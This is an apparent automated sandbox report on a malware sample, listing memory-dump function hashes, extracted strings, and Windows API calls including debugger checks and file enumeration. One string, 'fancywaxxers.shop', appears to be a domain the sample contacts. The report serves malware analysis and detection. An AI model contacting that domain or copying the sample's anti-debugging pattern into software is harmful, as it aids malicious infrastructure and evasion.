                                                                                                          • Opcode ID: d53e257c2075918734cd9bcba6b5da5e0b46016a60d2228bb7ca5af722daeddf
                                                                                                          • Instruction ID: d3f7bcd23a71bb6fca4cd7d9fe77f5dce33f5e25f3cb76845b8540b24cd68cf4
                                                                                                          • Opcode Fuzzy Hash: d53e257c2075918734cd9bcba6b5da5e0b46016a60d2228bb7ca5af722daeddf
                                                                                                          • Instruction Fuzzy Hash: 6CC19EB15083918BD334CF29C4913EBBBE1EFD2314F058A2DD8D95B290EB799845CB86
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 3DJ$@DrF$AH3$QmST$geYd
                                                                                                          • API String ID: 0-2788220846
                                                                                                          • Opcode ID: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
                                                                                                          • Instruction ID: 4f858eabc2a1050b4af87be1a3efc61e7958397d893593ca31e805b38df32c69
                                                                                                          • Opcode Fuzzy Hash: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
                                                                                                          • Instruction Fuzzy Hash: A051C42014D3D29AD3118F3984E039BFFE0AFA3304F18556EE8D45B386D33A891AD766
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a2e3378d954b4332bba990f659ed7c26a809c6bf1397c72b1adf76834141ef38
                                                                                                          • Instruction ID: c834cc8b419b4dd9201e287e4d8b2cfb8532693f29fa2e003de44d2b7d5f3269
                                                                                                          • Opcode Fuzzy Hash: a2e3378d954b4332bba990f659ed7c26a809c6bf1397c72b1adf76834141ef38
                                                                                                          • Instruction Fuzzy Hash: 60021D71E012299BDF14CFA9D8906EDFBF2FF48314F14826AE515E7340D731AA418B95
                                                                                                          APIs
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DB4F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 1974802433-0
                                                                                                          • Opcode ID: 77d28a65d806bb0f3c6fc3bf0b387d66a7d57d34f6da1f72cbb702ec6d94be8c
                                                                                                          • Instruction ID: f0f39c5bf0c75166bcf40b63e9f7d0547b368991347a1756891ea693d85e7482
                                                                                                          • Opcode Fuzzy Hash: 77d28a65d806bb0f3c6fc3bf0b387d66a7d57d34f6da1f72cbb702ec6d94be8c
                                                                                                          • Instruction Fuzzy Hash: 3A71C071D051989FDF20EF249C89AFAB7BAEB05300F5551DEE009A7359EB318E848F58
                                                                                                          APIs
                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006C9ADF
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 006C9BAB
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006C9BC4
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 006C9BCE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                          • String ID:
                                                                                                          • API String ID: 254469556-0
                                                                                                          • Opcode ID: 017f841f48c7800d22bc98802992ef81c7bcbdc1f0ce9c741b6e0017db4c07e9
                                                                                                          • Instruction ID: fe4f97ceb07a14972a51b8cf8d0f34adb6f609e96800abb75085056ff40ba68f
                                                                                                          • Opcode Fuzzy Hash: 017f841f48c7800d22bc98802992ef81c7bcbdc1f0ce9c741b6e0017db4c07e9
                                                                                                          • Instruction Fuzzy Hash: D53116B5D052189BDF60DFA4D989BDDBBB8EF08300F1041EAE40CAB250EB719A858F55
                                                                                                          APIs
                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00427DC0
                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                          • String ID: 7e1
                                                                                                          • API String ID: 237503144-1127181755
                                                                                                          • Opcode ID: 1b39cba85f7465282da7a1db2dc4396b6ecffed7ed28ec75b176153d7ede6d44
                                                                                                          • Instruction ID: c73f166b7c42da4403d63bb3e24580fd4c4d4143f2e15d469fbc9f0eaa75cdd5
                                                                                                          • Opcode Fuzzy Hash: 1b39cba85f7465282da7a1db2dc4396b6ecffed7ed28ec75b176153d7ede6d44
                                                                                                          • Instruction Fuzzy Hash: DB121471E04228CFDB14CF68D8917AEB7B1FF55310F1481AED846AB382DB389946CB95
                                                                                                          APIs
                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                          • String ID: 7e1${B
                                                                                                          • API String ID: 237503144-3235371320
                                                                                                          • Opcode ID: 1d05c416a86f48728e9a28166568a4afb16117623205e21ac6177041c8dc3b66
                                                                                                          • Instruction ID: 95f0cad8862f2af99a7bb935661dc1960fd3b24764110846962f877ea0b9236a
                                                                                                          • Opcode Fuzzy Hash: 1d05c416a86f48728e9a28166568a4afb16117623205e21ac6177041c8dc3b66
                                                                                                          • Instruction Fuzzy Hash: F4021571E08224CFDB14CF68D8917AEB7B1FF95314F1481AED846AB381DB389942CB95
                                                                                                          APIs
                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                          • String ID: 7e1${B
                                                                                                          • API String ID: 237503144-3235371320
                                                                                                          • Opcode ID: 6a17e22f67e02696a72774e7070fabe38b7a2f0cdbdf55b684643e6438018d23
                                                                                                          • Instruction ID: ffbaa110a31002c00b33609662cf676e3cfc5359165e1e1bb80dc834af8824ee
                                                                                                          • Opcode Fuzzy Hash: 6a17e22f67e02696a72774e7070fabe38b7a2f0cdbdf55b684643e6438018d23
                                                                                                          • Instruction Fuzzy Hash: 74023471E08224CFDB14CF64D8917AEB7B1FF95314F1481ADD846AB382DB389942CB95
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: J$n~xx$urz|
                                                                                                          • API String ID: 0-3220001382
                                                                                                          • Opcode ID: b31e8aa4af254f48f2630a33910aa6890d488a9be7c75a24b6ff0c3cf5e54a69
                                                                                                          • Instruction ID: 6a91fd7be6a80c1624e75f382a73f26f0e074c3cb1dfdb16b98c5d7a18dbd3f0
                                                                                                          • Opcode Fuzzy Hash: b31e8aa4af254f48f2630a33910aa6890d488a9be7c75a24b6ff0c3cf5e54a69
                                                                                                          • Instruction Fuzzy Hash: 7652BB7850C3918FC725CF29C8506AFBBE1AF95314F084B6DE8E547392D7399805CB9A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: BDE:$L4$L4
                                                                                                          • API String ID: 0-3692522541
                                                                                                          • Opcode ID: be6432e084263a3291549fe13bd0a810b6e47c040b8f48670cceb1158c16825f
                                                                                                          • Instruction ID: dd390c41524992b3b41842bda6cd178197e7fbbdd3d64fed8634c62cd5e5b5ab
                                                                                                          • Opcode Fuzzy Hash: be6432e084263a3291549fe13bd0a810b6e47c040b8f48670cceb1158c16825f
                                                                                                          • Instruction Fuzzy Hash: FF125C72A082519FD724CF28C8517AFB3E2EBD5314F19893ED48AC7351DB389841CB8A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: :G!A$Vw1q${u
                                                                                                          • API String ID: 0-645793561
                                                                                                          • Opcode ID: 5aabdbd3031ce8a4584c980d2b67a6b8cdd154d9a8e847e6682a9da6037f3857
                                                                                                          • Instruction ID: e35f9824382157240d3d87f0a1d15c17bfd725fbec35765ed2db11ef4fc98c05
                                                                                                          • Opcode Fuzzy Hash: 5aabdbd3031ce8a4584c980d2b67a6b8cdd154d9a8e847e6682a9da6037f3857
                                                                                                          • Instruction Fuzzy Hash: 6C0242B5900216CFDB14CF29C8815FBBBB2FF56310F188569E855AB342E338A991CBD5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $0Qx$*0Qx$`a
                                                                                                          • API String ID: 0-2354730689
                                                                                                          • Opcode ID: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
                                                                                                          • Instruction ID: 6e7c93c0a148da01ad464f35dcf862257e7f2efdc77a60f70c0a7fadf4f8a59e
                                                                                                          • Opcode Fuzzy Hash: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
                                                                                                          • Instruction Fuzzy Hash: D5D1243F618212CBCB188F29D86126BB3F2FF8A752F1A947DC485472A0EB789C51D745
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "uB$)yB$QyB
                                                                                                          • API String ID: 0-1484077961
                                                                                                          • Opcode ID: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
                                                                                                          • Instruction ID: bebb4fd51b4539f016b18d377b659452e01560476b88e099c37467506dc643be
                                                                                                          • Opcode Fuzzy Hash: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
                                                                                                          • Instruction Fuzzy Hash: 75D12676A0C351CFD714CF28D85131ABBE2AF86314F0989ADE4959B3A1D738ED41CB86
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: >MA$]k$rIA
                                                                                                          • API String ID: 0-1646247225
                                                                                                          • Opcode ID: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
                                                                                                          • Instruction ID: 7dcd1ab1f66cc66079ed29567c30894e9083a3f88b64816671fdba32d81f215f
                                                                                                          • Opcode Fuzzy Hash: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
                                                                                                          • Instruction Fuzzy Hash: 604158B6A4836286D718CF24E8513A7B3E2EFE5314F19443ED88597781F7788C41C39A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: `ibc$PB
                                                                                                          • API String ID: 0-1987769102
                                                                                                          • Opcode ID: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
                                                                                                          • Instruction ID: d7af6ebc4ec7fa9aafc34c7092b5181dfb32356bb0cb9250f61f6585be71885b
                                                                                                          • Opcode Fuzzy Hash: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
                                                                                                          • Instruction Fuzzy Hash: 862237366183258BC324DF39DC412ABB7E2EFD5314F59893EE891D7390E77899018B89
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: f$xHLG
                                                                                                          • API String ID: 2994545307-1062749201
                                                                                                          • Opcode ID: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
                                                                                                          • Instruction ID: d2651cdac37472708b43d0abb75bf2b64163b131a76c60ca99435b560db9f8b9
                                                                                                          • Opcode Fuzzy Hash: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
                                                                                                          • Instruction Fuzzy Hash: 092215756483418FD314CF24C8C172BB7E2ABC9314F19A93EE585A7392D679DC418B8A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: H/'&$ur
                                                                                                          • API String ID: 0-969745386
                                                                                                          • Opcode ID: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
                                                                                                          • Instruction ID: 443a563da7a5e4d6bc490b1340c0ec2082c34ead57a9a2c43d9228df9cd59d8b
                                                                                                          • Opcode Fuzzy Hash: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
                                                                                                          • Instruction Fuzzy Hash: 99322776B083608BD728CF29D85176BB7E2EBC5314F09857DE8899B391DB749C01C78A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 30$b
                                                                                                          • API String ID: 0-3051719697
                                                                                                          • Opcode ID: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
                                                                                                          • Instruction ID: 9d6171b0f8d729934fe615063e41a7396b25218e269f5ca015a4c9f4117884d8
                                                                                                          • Opcode Fuzzy Hash: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
                                                                                                          • Instruction Fuzzy Hash: D4F134B5949340CBD724DF24C851BEBB3B1EFD5354F098A2EE48A4B391E7385841CB8A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: fancywaxxers.shop$~|
                                                                                                          • API String ID: 0-1994482202
                                                                                                          • Opcode ID: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
                                                                                                          • Instruction ID: 07f789514de0362c9278d2f25248cc3fff6a0dc72d81a8c8c11c8a6f1e2f7610
                                                                                                          • Opcode Fuzzy Hash: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
                                                                                                          • Instruction Fuzzy Hash: 9902DEB114D3C18AD735CF25D4907EFBBE0EB96304F188A6DC4D96B252C3794906CB9A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0v9t$qN
                                                                                                          • API String ID: 0-941405136
                                                                                                          • Opcode ID: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
                                                                                                          • Instruction ID: 220aa0fee5a4e2dc26cf1b999887b7bccb6aee529e7354faf9f9a8d1f9f2e198
                                                                                                          • Opcode Fuzzy Hash: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
                                                                                                          • Instruction Fuzzy Hash: 495147766053114BC7248A24C8917EF7693DBC1328F1B4A2DD8E59B3D2DB3DD84693CA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$MVWT
                                                                                                          • API String ID: 0-308850327
                                                                                                          • Opcode ID: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
                                                                                                          • Instruction ID: 65c5c0bd10fcc527816f4646fa5217bc89ccf3aa808f0d29d6591c7bb2e007d1
                                                                                                          • Opcode Fuzzy Hash: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
                                                                                                          • Instruction Fuzzy Hash: D54113765193418BE704CF26C45036BB7E2EFDA305F59682ED4C2AB394DB7C8906CB4A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: siOk$siOk
                                                                                                          • API String ID: 0-2545891108
                                                                                                          • Opcode ID: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
                                                                                                          • Instruction ID: 3c122c9db7ae0a256ae9501e17b53326d689da9f2a67ac00692780b2415a66a0
                                                                                                          • Opcode Fuzzy Hash: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
                                                                                                          • Instruction Fuzzy Hash: AB21052951DAA04BCB36CB3D44D463EBBE65F97110B08897DDCE2C73CAC5249800D765
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: /:8*$x
                                                                                                          • API String ID: 0-64667063
                                                                                                          • Opcode ID: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
                                                                                                          • Instruction ID: 1aa5775c3a72f552b4e6bc18da63457a51b737a705f76bfcd9083c664813a2f3
                                                                                                          • Opcode Fuzzy Hash: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
                                                                                                          • Instruction Fuzzy Hash: E9014526A0D2B18AD301CA289980217FFD19B97700F184A99D4E6A7290C928DE05879A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
                                                                                                          • Instruction ID: 0c1059f1939fd580b755bdfd37faf5cc9b9fc08dac3a05aab46d246ee4cf4ccd
                                                                                                          • Opcode Fuzzy Hash: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
                                                                                                          • Instruction Fuzzy Hash: DC816976A083109FE320DF54DC817EBB7E5EBC4308F04453EFA8897291D77899068B96
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "
                                                                                                          • API String ID: 0-123907689
                                                                                                          • Opcode ID: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
                                                                                                          • Instruction ID: fc6a7fef22a05f64015de1e3c3639137bf4aa38685eff02bd3fad1d047ddcb30
                                                                                                          • Opcode Fuzzy Hash: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
                                                                                                          • Instruction Fuzzy Hash: 86D11672B083259FC714CE24E48076BB7E5AB84314F88896EEC9987382E778DC55C797
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: UR
                                                                                                          • API String ID: 0-57707318
                                                                                                          • Opcode ID: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
                                                                                                          • Instruction ID: 8fe4e70974bd7395cce93e3b113d0d48c717d0737e0d11109a7980f2f1e1c3b0
                                                                                                          • Opcode Fuzzy Hash: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
                                                                                                          • Instruction Fuzzy Hash: 61B133755583018BC720CF28CC926ABB7F1EF91364F18961DE8D59B390E338D945C79A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: `ibc
                                                                                                          • API String ID: 2994545307-3725910391
                                                                                                          • Opcode ID: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
                                                                                                          • Instruction ID: f6e7def48d8e745c044bbeb26ce4e72402efdfd5aebbe0cd908a1d30c76b08d8
                                                                                                          • Opcode Fuzzy Hash: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
                                                                                                          • Instruction Fuzzy Hash: DA9114356183019BE714CF18C89166FB7E2EFD9310F18852DEA858B391EB35DC61CB86
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: :;8
                                                                                                          • API String ID: 0-370357910
                                                                                                          • Opcode ID: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
                                                                                                          • Instruction ID: 6cb1dbdef0645cb70831a53be780a797aaf24bd5e036ecf1d586697fe6f75162
                                                                                                          • Opcode Fuzzy Hash: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
                                                                                                          • Instruction Fuzzy Hash: 1751E0B1A483108BD714DF64C8126ABB7F2EF86318F18896DE4858B391E73AD506C75A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: XL
                                                                                                          • API String ID: 0-2397331993
